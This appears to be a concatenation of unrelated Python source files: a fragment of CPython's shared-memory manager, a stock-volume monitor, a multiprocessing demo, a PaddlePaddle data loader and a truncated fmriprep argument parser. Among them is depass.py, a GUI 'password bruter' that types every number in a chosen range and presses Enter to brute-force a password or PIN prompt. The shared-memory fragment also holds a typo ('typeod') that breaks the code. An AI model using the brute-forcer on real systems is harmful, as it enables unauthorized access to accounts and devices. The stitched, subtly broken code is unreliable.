address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(*args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if len(args) >= 3:
typeod = args[2]
elif 'typeid' in kwargs:
typeid = kwargs['typeid']
elif not args:
raise TypeError("descriptor 'create' of 'SharedMemoryServer' "
"object needs an argument")
else:
raise TypeError('create expected at least 2 positional '
'arguments, got %d' % (len(args)-1))
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(*args, **kwargs)
create.__text_signature__ = '($self, c, typeid, /, *args, **kwargs)'
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
pass
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
|
depass.py
|
#-*- coding: utf-8 -*-
from pykeyboard import PyKeyboard
import itertools
import time
import tkinter as tk
import tkinter.messagebox
import threading
import inspect
import ctypes
import win32con
import ctypes.wintypes
import pygame,os,sys
from tkinter import ttk
global T1,T2 #T1存放brute线程,T2存放进度条线程
global maximum
global start,end,sleep,step
maximum = 200 #进度条最大刻度
window = tk.Tk()
k = PyKeyboard()
SLEEP=tk.DoubleVar() #与scale绑定
GO=False #用来传递爆破的参数
STOP=False #用来传递停止爆破的参数
EXIT = False #用来传递退出程序的参数
user32 = ctypes.windll.user32 #加载user32.dll
#注册热键的唯一id,用来区分热键
id1=109 #F1 (brute)
id2=110 #F2 (stop brute)
id3=111 #F3 (stop program)
def __start_end(): #获取输入的start和end
global start,end,step
start = int(START.get())
end = int(END.get())
step = maximum / (end - start +1) #计算进度条每次前进走的格数
return
def start_end():
T = threading.Thread(target=__start_end)
T.setDaemon(True) #设为守护线程,父线程(此处为主程序)退出后,所有守护线程退出
T.start()
def __interval(): #设置每次爆破时间间隔
global sleep
sleep = SLEEP.get()
return
def interval(self):
T = threading.Thread(target=__interval)
T.setDaemon(True)
T.start()
def __brute(): #开始爆破
global sleep,start,end
ns = itertools.count(start) #重置迭代器 #start from here,ns为原始序列
j = itertools.takewhile(lambda x:x<=end,ns) #to here,j为截取序列序列
time.sleep(3) #3秒延时后爆破
progress() #开始推动进度条
for i in j:
time.sleep(sleep)
k.type_string(str(i))
time.sleep(0.001) #按键间隔
k.tap_key(k.enter_key)
# print(p1['value'])
return
def brute():
global T1
T1 = threading.Thread(target=__brute)
T1.setDaemon(True)
T1.start()
def __stop_thread(thread):
_async_raise(thread.ident, SystemExit)
def stop_thread():
__stop_thread(T1) #终止brute线程
__stop_thread(T2) #终止进度条线程
p1['value'] = 0 #重置进度条
def __monitor(): #监视热键是否被激活
global GO,STOP,EXIT
while(True):
if GO==True:
#这里是用于开始爆破的
brute()
GO=False
elif STOP==True:
#这里是用于停止爆破的
stop_thread()
STOP=False
elif EXIT==True:
#这里是用于退出程序的
window.destroy()
def monitor():
T = threading.Thread(target=__monitor) #创建监听热键的线程
T.setDaemon(True)
T.start()
def __playSans(): #播放sound
pygame.mixer.init() #初始化声音播放模块
APP_FOLDER = os.path.dirname(os.path.realpath(sys.argv[0])) #读取当前工作目录
os.chdir(APP_FOLDER) #改变当前工作目录
pygame.mixer.music.load("sans.ogg") #导入ogg
pygame.mixer.music.play(-1, 0) #-1表示循环,从0秒处开始播放
def playSans():
T = threading.Thread(target=__playSans) #创建播放线程
T.setDaemon(True)
T.start()
def __progress(): #推进进度条
num = end - start + 1 #一次爆破num个code
for i in range(1, num + 1):
time.sleep(0.023)
time.sleep(sleep)
p1.step(step)
window.update()
p1['value'] = maximum
# for i in range(start,end+1):
# p1['value'] = i
# window.update()
# #print(i)
# time.sleep(sleep)
def progress(): #创建进度条子线程
global T2
T2 = threading.Thread(target=__progress)
T2.setDaemon(True) #设为守护线程,父线程(此处为主程序)退出后,所有守护线程退出
T2.start()
def _async_raise(tid, exctype): #终止线程的函数
"""raises the exception, performs cleanup if needed"""
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
def closeWindow(): #点击x是询问是否退出
ans = tk.messagebox.askyesno(title='Warning',message='Close the application?',default='no')
if ans:
window.destroy()
else:
return
class Hotkey(threading.Thread): #创建一个Thread.threading的扩展类
def run(self):
global GO,STOP,EXIT #定义全局变量,这个可以在不同线程间共用。
if not user32.RegisterHotKey(None, id1, 0, win32con.VK_F1): # 注册快捷键F1并判断是否成功,该热键用于开始爆破
print ("Unable to register id"), id1 # 返回一个错误信息
if not user32.RegisterHotKey(None, id2, 0, win32con.VK_F2): # 注册快捷键F2并判断是否成功,该热键用于结束爆破
print ("Unable to register id"), id2
if not user32.RegisterHotKey(None, id3, 0, win32con.VK_F3): # 注册快捷键F3并判断是否成功,该热键用于结束程序
print ("Unable to register id"), id3
#以下为检测热键是否被按下,并在最后释放快捷键
try:
msg = ctypes.wintypes.MSG()
while True:
if user32.GetMessageA(ctypes.byref(msg), None, 0, 0) != 0:
if msg.message == win32con.WM_HOTKEY:
if msg.wParam == id1: #激活热键
GO = True
elif msg.wParam == id2:
STOP = True
elif msg.wParam == id3:
EXIT = True
user32.TranslateMessage(ctypes.byref(msg))
user32.DispatchMessageA(ctypes.byref(msg))
finally:
user32.UnregisterHotKey(None, id1) #必须得释放热键,否则下次就会注册失败,所以当程序异常退出,没有释放热键,
#那么下次很可能就没办法注册成功了,这时可以换一个热键测试
user32.UnregisterHotKey(None, id2)
user32.UnregisterHotKey(None, id3)
monitor() #监听热键
playSans() #播放sans
hotkey = Hotkey() #创建热键线程
hotkey.setDaemon(True)
hotkey.start()
window.protocol('WM_DELETE_WINDOW', closeWindow) #接受到点击关闭时调用函数closeWindow
#以下为gui界面
window.title('password bruter')
window.geometry('600x360') #设置分辨率
l = tk.Label(window, text="Brute every 'sleep' seconds from 'start' to 'end' which you set BELOW", font=('Arial', 11, 'bold'), width=100, height=2)
l.pack() #标题
m = tk.Label(window, text="Press 'F3' to quit the program! ! !", font=('Arial', 11, 'bold'), width=50, height=1, underline='8')
m.pack()
stitle = tk.Label(window, text='start')
stitle.pack()
START = tk.Entry(window, cursor='plus', width=15) #start输入文本框
START.pack()
etitle = tk.Label(window, text='end')
etitle.pack()
END = tk.Entry(window, cursor='plus', width=15) #end输入文本框
END.pack()
b1 = tk.Button(window, text='ok', width=14, height=1, command=start_end) #按钮b1
b1.pack()
s = tk.Scale(window, label='select sleep interval', cursor='circle', sliderrelief='raised', sliderlength=50, tickinterval=0.2, bd=5, from_=0, to=1, resolution=0.001, orient=tk.HORIZONTAL, length=400, variable=SLEEP, command=interval)
s.pack() #设置sleep间隔滑块
p1 = ttk.Progressbar(window, length=400, orient=tk.HORIZONTAL, mode='determinate')
p1.pack()
p1['maximum'] = maximum
b2 = tk.Button(window, text='start blasting(F1)', width=15, height=1, underline=16, command=brute)
b2.pack(side='left', anchor='w', padx=50) #按钮b2,开始爆破
b3 = tk.Button(window, text='stop blasting(F2)', width=15, height=1, underline=15, command=stop_thread)
b3.pack(side='right', anchor='e', padx=50) #按钮b3,停止进程
window.mainloop()
|
real_time_big_deal.py
|
# -*-coding=utf-8-*-
__author__ = 'Rocky'
'''
http://30daydo.com
Contact: weigesysu@qq.com
'''
import datetime
import tushare as ts
import pandas as pd
import time,os,threading
import numpy as np
from toolkit import Toolkit
pd.set_option('display.max_rows',None)
class BigMonitor():
def __init__(self):
path=os.path.join(os.getcwd(),'data')
if os.path.exists(path)==False:
os.mkdir(path)
print("Please put data under data folder")
exit()
os.chdir(path)
self.stockList=Toolkit.read_stock('mystock.csv')
self.bases=pd.read_csv('bases.csv',dtype={'code':np.str})
def loop(self,code):
name=self.bases[self.bases['code']==code]['name'].values[0]
print(name)
while 1:
time.sleep(2)
df_t1=ts.get_realtime_quotes(code)
v1=long(df_t1['volume'].values[0])
p1=float(df_t1['price'].values[0])
#print(df_t1)
time.sleep(2)
df_t2=ts.get_realtime_quotes(code)
v2=long(df_t2['volume'].values[0])
p2=float(df_t2['price'].values[0])
delta_v= (v2-v1)/100
#换成手
#计算价差
price_v=p2-p1
if delta_v >1000:
print(datetime.datetime.now().strftime('%H:%M:%S'))
print("Big deal on %s" %name,)
print(delta_v,'price diff',price_v)
def multi_thread(self,code_list):
thread_list=[]
for i in code_list:
t=threading.Thread(target=self.loop,args=(i,))
thread_list.append(t)
for j in thread_list:
j.start()
def testcase(self):
self.multi_thread(self.stockList)
def main():
obj=BigMonitor()
obj.testcase()
main()
|
mp10manager.py
|
#!/usr/bin/env python
"""mp10manager.py: Use multiprocessing.Manager.
Usage:
mp10manager.py
"""
import multiprocessing as mp
def f(d, l):
d[1] = '1'
d['2'] = 2
d[0.25] = None
l.reverse()
def main():
with mp.Manager() as mgr:
d = mgr.dict()
l = mgr.list(range(10))
p = mp.Process(target=f, args=(d, l,))
p.start()
p.join()
print(d, l)
if __name__ == '__main__':
main()
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import logging
import itertools
import threading
import numpy as np
import multiprocessing
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
from .. import core
from ..framework import in_dygraph_mode
from ..multiprocess_utils import CleanupFuncRegistrar, _cleanup_mmap, _set_SIGCHLD_handler
# multi-process worker check indices queue interval, avoid
# hanging in subprocess data loading
MP_INDICES_CHECK_INTERVAL = 5
def _default_collate_fn(batch):
sample = batch[0]
# dataset has only 1 field
if isinstance(sample, np.ndarray):
return [np.stack(batch, axis=0)]
# batch each field
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
return [np.stack(slot, axis=0) for slot in slots]
class ParentWatchDog(object):
def __init__(self):
self._parent_pid = os.getppid()
self._parent_alive = True
def is_alive(self):
if self._parent_alive:
self._parent_alive = os.getppid() == self._parent_pid
return self._parent_alive
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._sampler_iter = iter(loader.batch_sampler)
self._collate_fn = loader.collate_fn or _default_collate_fn
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_INDICES_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
# NOTE: len(self._places) batch data compose as an output
# iteration, set blocking_queue can cache 2 iteration datas
# at most here
self._blocking_queue_capacity = 2 * len(self._places)
self._init_thread()
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True)
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _thread_loop(self):
try:
for indices in self._sampler_iter:
# read data from dataset in mini-batch
batch = [self._dataset[i] for i in indices]
if self._collate_fn is not None:
batch = self._collate_fn(batch)
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if not isinstance(slot, core.LoDTensor):
self._check_input_array(slot)
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning("DataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
@classmethod
def _check_input_array(cls, item):
arr = np.array(item)
if arr.dtype == np.object:
raise TypeError((
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor."))
def __next__(self):
try:
if in_dygraph_mode():
return self._reader.read_next_var_list()
else:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._reader.reset()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess wrokers' result queue
self._data_queue = None
# data get from _data_queue will be reordered by _rcvd_idx
# for data order keeping, data index not equal _rcvd_idx
# will be cached in _reorder_dict
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._reorder_dict = {}
# indices outstand as _outstanding_capacity at first, and
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here to make sure each indices_queue
# has at least 2 indices, and outstanding batch cached
# output data for at least 2 iterations(Note that len(_places)
# batches will be composed as an iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
self._init_workers()
self._init_thread()
self._shutdown = False
for _ in range(self._outstanding_capacity):
self._try_put_indices()
def _init_workers(self):
# multiprocess worker and indice queue list initial as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# event for workers and thread, thread event is only need
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=self._worker_loop,
args=(self._dataset, indices_queue, self._data_queue,
self._workers_done_event, self._collate_fn,
self._worker_init_fn, i))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True)
self._thread_done_event = threading.Event()
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
def _shutdown_worker(self, worker_id):
if self._worker_status[worker_id]:
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# set _workers_done_event should be set before put None
# to indices_queue, workers wll exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i)
for w in self._workers:
w.join()
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _worker_loop(self, dataset, indices_queue, out_queue, done_event,
collate_fn, init_fn, worker_id):
try:
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
# set signal handler
core._set_process_signal_handler()
init_exception = None
if init_fn is not None:
try:
init_fn(worker_id)
except:
init_exception = Exception("init_fn failed in worker {}: " \
"{}".format(worker_id, sys.exc_info()))
parent_watch_dog = ParentWatchDog()
while parent_watch_dog.is_alive():
try:
data = indices_queue.get(MP_INDICES_CHECK_INTERVAL)
except queue.Empty:
continue
# None as poison piil, so worker event should be set
if data is None:
assert done_event.is_set(
), "get None when worker done_event set"
break
# If worker done event is set but get still get data in
# indices_queue, remaining data should be get and skipped.
if done_event.is_set():
continue
idx, indices = data
try:
if init_exception is not None:
batch = init_exception
init_exception = None
else:
batch = [dataset[i] for i in indices]
if self._collate_fn is not None:
batch = self._collate_fn(batch)
except Exception as e:
out_queue.put((idx, e))
else:
if self._use_shared_memory:
tensor_list = core._convert_to_tensor_list(batch)
out_queue.put((idx, tensor_list))
core._remove_tensor_list_mmap_fds(tensor_list)
else:
out_queue.put((idx, batch))
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
finally:
if self._use_shared_memory:
_cleanup_mmap()
def _thread_loop(self):
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
elif isinstance(batch, Exception):
self._exit_thread_unexpectedly()
else:
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
# serializable, cannot be create in workers
for slot in batch:
if not isinstance(slot, core.LoDTensor):
# self._check_input_array(slot)
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
if self._rcvd_idx in self._reorder_dict.keys():
return self._reorder_dict.pop(self._rcvd_idx)
while not self._thread_done_event.is_set():
try:
# [ avoid hang ]: main process may blocking at _reader.read_next when
# KeyboardInterrupt, we do following tradeoff:
# 1. get data with timeout, MP_INDICES_CHECK_INTERVAL(5s) as timeout
# default, if KeyboardInterrupt blocking, failed workers will be
# checked and raise RuntimeError to quit DataLoader in timeout
# exception handling.
# 2. if get data timeout and check workers all alive, continue to
# get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
idx, batch = data
if idx == self._rcvd_idx:
return batch
else:
self._reorder_dict[idx] = batch
continue
def _try_put_indices(self):
assert self._send_idx - self._rcvd_idx <= self._outstanding_capacity, \
"too many indices have been put to queue"
try:
indices = next(self._sampler_iter)
except StopIteration:
return
worker_idx = next(self._workers_idx_cycle)
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def __next__(self):
try:
# _batches_outstanding here record the total batch data number
# in 'from after _try_put_indices to beforeoutput data', this
# value should be _outstanding_capacity if data is not drained,
# if _batches_outstanding is less than _places number, there are
# no enough data to generate next output, close blocking_queue and
# set _thread_done_event here, py_reader will raise StopIteration,
# end workers and indices_queues in StopIteration handling
if self._batches_outstanding < len(self._places):
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
else:
if self._return_list:
data = self._reader.read_next_list()
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
self._reader.reset()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
fMRI preprocessing workflow
=====
"""
import os
import os.path as op
from pathlib import Path
import logging
import sys
import gc
import re
import uuid
import json
import tempfile
import psutil
import warnings
import subprocess
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from multiprocessing import cpu_count
from time import strftime
from glob import glob
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def check_deps(workflow):
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd') and
which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object"""
from ..__about__ import __version__
verstr = 'fmriprep v{}'.format(__version__)
parser = ArgumentParser(description='FMRIPREP: fMRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store',
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store',
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'FMRIPREP (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version=verstr)
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--skip_bids_validation', '--skip-bids-validation', action='store_true',
default=False,
help='assume the input dataset is BIDS compliant and skip the validation')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_bids.add_argument('--echo-idx', action='store', type=int,
help='select a specific echo to be processed in a multiecho series')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for FMRIPREP processes')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument('--ignore-aroma-denoising-errors', action='store_true',
default=False,
help='ignores the errors ICA_AROMA returns when there '
'are no components classified as either noise or '
'signal')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_perfm.add_argument('--debug', action='store_true', default=False,
help='DEPRECATED - Does not do what you want.')
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming', 'sbref'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument('--bold2t1w-dof', action='store', default=6, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'6 degrees (rotation and translation) are used by default.')
g_conf.add_argument(
'--output-space', required=False, action='store',
choices=['T1w', 'template', 'fsnative', 'fsaverage', 'fsaverage6', 'fsaverage5'],
nargs='+', default=['template', 'fsaverage5'],
help='volume and surface spaces to resample functional series into\n'
' - T1w: subject anatomical volume\n'
' - template: normalization target specified by --template\n'
' - fsnative: individual subject surface\n'
' - fsaverage*: FreeSurfer average meshes\n'
'this argument can be single value or a space delimited list,\n'
'for example: --output-space T1w fsnative'
)
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--template', required=False, action='store',
choices=['MNI152NLin2009cAsym'], default='MNI152NLin2009cAsym',
help='volume template space (default: MNI152NLin2009cAsym)')
g_conf.add_argument(
'--output-grid-reference', required=False, action='store',
help='Deprecated after FMRIPREP 1.0.8. Please use --template-resampling-grid instead.')
g_conf.add_argument(
'--template-resampling-grid', required=False, action='store', default='native',
help='Keyword ("native", "1mm", or "2mm") or path to an existing file. '
'Allows to define a reference grid for the resampling of BOLD images in template '
'space. Keyword "native" will use the original BOLD grid as reference. '
'Keywords "1mm" and "2mm" will use the corresponding isotropic template '
